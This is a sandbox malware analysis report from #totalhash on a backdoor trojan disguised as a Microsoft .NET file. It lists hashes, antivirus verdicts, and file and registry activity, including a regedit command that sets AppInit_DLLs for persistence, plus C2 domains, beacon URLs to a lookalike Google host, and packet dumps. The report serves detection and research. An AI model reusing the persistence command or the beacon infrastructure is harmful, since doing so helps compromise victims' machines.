Analysis | #totalhash

Analysis Date	2014-11-30 18:09:44
MD5	c6992e84d0bf7f790628327e6413e462
SHA1	b5a7d2a03641ee64af9061880ef27aee446c187b

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: adf32ccf9922242eaee61c738cd1ae66 sha1: 7d47dc758465eb7516c09359e9eac2f5055a414c size: 27136
Section	.rdata md5: 7a5c509b614766e6ef18351017ab61f7 sha1: 4529a0aec47bb99e3ea92834146f2b2735a7a5ba size: 7680
Section	.data md5: 31789e4f2ccb9bcd6f2b7bf0a1298b49 sha1: 9d1ca1112c71e51599d1293b7d9f4beea028e12a size: 5120
Section	.rsrc md5: 28cbcac1d6eb588a7e4d1081d7ce040f sha1: 17aa345e6b2273527b00d6d276f4355fce4ea93a size: 139776
Timestamp	2012-12-18 17:04:04
Version	LegalCopyright: © Microsoft Corporation. All rights reserved. InternalName: NETFXSBS10.exe FileVersion: 2.0.50727.42 (RTM.050727-4200) CompanyName: Microsoft Corporation Comments: Flavor=Retail ProductName: Microsoft® .NET Framework ProductVersion: 2.0.50727.42 FileDescription: Microsoft .NET viewer OriginalFilename: NETFXSBS10.exe
Packer	Microsoft Visual C++ ?.?
PEhash	2ddf6ac218174d913b020c5b622ad80fcc481af7
IMPhash	ecace9b6a70583493455288bf01f7bbc
AV	360 Safe	Gen:Variant.Symmi.8415
AV	Ad-Aware	Gen:Variant.Symmi.8415
AV	Alwil (avast)	Crypt-OQY [Trj]
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Cidox.A.gen!Eldorado
AV	Avira (antivir)	TR/Drop.Vundo.voua
AV	BullGuard	Gen:Variant.Symmi.8415
AV	CA (E-Trust Ino)	no_virus
AV	CAT (quickheal)	Trojan.Vundo.Gen
AV	ClamAV	WIN.Trojan.Cidox-1024
AV	Dr. Web	Trojan.Inject1.15498
AV	Emsisoft	Gen:Variant.Symmi.8415
AV	Eset (nod32)	Win32/Kryptik.AQUP
AV	Fortinet	W32/Kryptik.FAGX!tr
AV	Frisk (f-prot)	W32/Cidox.A.gen!Eldorado
AV	F-Secure	Gen:Variant.Symmi.8415
AV	Grisoft (avg)	Generic_r.BZR
AV	Ikarus	Backdoor.Win32.Cidox
AV	K7	Backdoor ( 04c547291 )
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	Backdoor.Cidox.WMP
AV	Mcafee	Vundo-FAGX!C6992E84D0BF
AV	Microsoft Security Essentials	TrojanDropper:Win32/Vundo.V
AV	MicroWorld (escan)	Gen:Variant.Symmi.8415
AV	Rising	no_virus
AV	Sophos	no_virus
AV	Symantec	Backdoor.Trojan
AV	Trend Micro	no_virus
AV	VirusBlokAda (vba32)	Malware-Cryptor.SB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry	HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File	C:\WINDOWS\system32\zylkmei.dll
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Cookies\cf
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process	C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS	detoxist.com
Winsock DNS	clickbeta.ru
Winsock DNS	91.220.35.154
Winsock DNS	veroconma.com
Winsock DNS	terrans.su
Winsock DNS	getinball.com
Winsock DNS	geostepster.com
Winsock DNS	theloamva.com
Winsock DNS	tryatdns.com
Winsock DNS	clickclans.ru
Winsock DNS	dentagod.com
Winsock DNS	denareclick.com
Winsock DNS	debijonda.com
Winsock DNS	fescheck.com
Winsock DNS	liteworns.com
Winsock DNS	getintsu.com
Winsock DNS	nshouse1.com
Winsock DNS	netrovad.com
Winsock DNS	vengibit.com
Winsock DNS	tryangets.com
Winsock DNS	vornedix.com
Winsock DNS	inzavora.com
Winsock DNS	getavodes.com
Winsock DNS	degoog1etag.com
Winsock DNS	clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\zylkmei.dll\\x00

Network Details:

DNS	geostepster.com Type: A 208.73.211.250
DNS	geostepster.com Type: A 208.73.210.211
DNS	geostepster.com Type: A 208.73.211.167
DNS	geostepster.com Type: A 208.73.211.244
DNS	detoxist.com Type: A 141.8.225.80
DNS	debijonda.com Type: A 141.8.225.80
DNS	veroconma.com Type: A 74.117.179.241
DNS	theloamva.com Type: A 141.8.225.80
DNS	vornedix.com Type: A 141.8.225.80
DNS	dentagod.com Type: A 141.8.225.80
DNS	liteworns.com Type: A 141.8.225.80
DNS	vengibit.com Type: A 141.8.225.80
DNS	tryangets.com Type: A 141.8.225.80
DNS	getintsu.com Type: A 141.8.225.80
DNS	getavodes.com Type: A 209.222.14.3
DNS	tryatdns.com Type: A 209.222.14.3
DNS	fescheck.com Type: A 109.234.109.76
DNS	inzavora.com Type: A 141.8.225.80
DNS	degoog1etag.com Type: A
DNS	getinball.com Type: A
DNS	netrovad.com Type: A
DNS	terrans.su Type: A
DNS	clickstano.com Type: A
DNS	denareclick.com Type: A
DNS	clickbeta.ru Type: A
DNS	nshouse1.com Type: A
DNS	clickclans.ru Type: A
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+hScGIDlQq User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjlDKDsPoCXEh User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsKvrSP7OO9B User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsKvrSP7OO9B User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjoSpXNvS7oGU User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjoSpXNvS7oGU User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjkdS0ll7hOJd User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjju/fGzdThMI User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjk+SZNMtIOIh User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjjAwdG2uTUow User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjsBu5j+Qdpcj User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1177&av=0&vm=0&al=0&p=133&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1SD16Pojzv3PV7XgY2dWlP45s7V2jabjuFHVQoCdBuf User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 208.73.211.250:80
Flows TCP	192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1034 ➝ 74.117.179.241:80
Flows TCP	192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1042 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1043 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1044 ➝ 109.234.109.76:80
Flows TCP	192.168.1.1:1045 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1046 ➝ 91.220.35.154:80

Raw Pcap

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 2b685363 4749446c 51712048   abjk+hScGIDlQq H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 2b685363 4749446c 51712048   abjk+hScGIDlQq H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6c 444b4473 506f4358 45682048   abjlDKDsPoCXEh H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4b767253 50374f4f 39422048   abjsKvrSP7OO9B H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4b767253 50374f4f 39422048   abjsKvrSP7OO9B H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6f 5370584e 7653376f 47552048   abjoSpXNvS7oGU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6f 5370584e 7653376f 47552048   abjoSpXNvS7oGU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a6b 6453306c 6c37684f 4a642048   abjkdS0ll7hOJd H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796731 53443136 506f6a7a 76335056   Wyg1SD16Pojzv3PV
0x000000b0 (00176)   37586759 3264576c 50343573 3756326a   7XgY2dWlP45s7V2j
0x000000c0 (00192)   61626a73 4275356a 2b516470 636a2048   abjsBu5j+Qdpcj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31373726   XX0000&key=1177&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d313333 266f733d 352e312e 32363030   =133&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
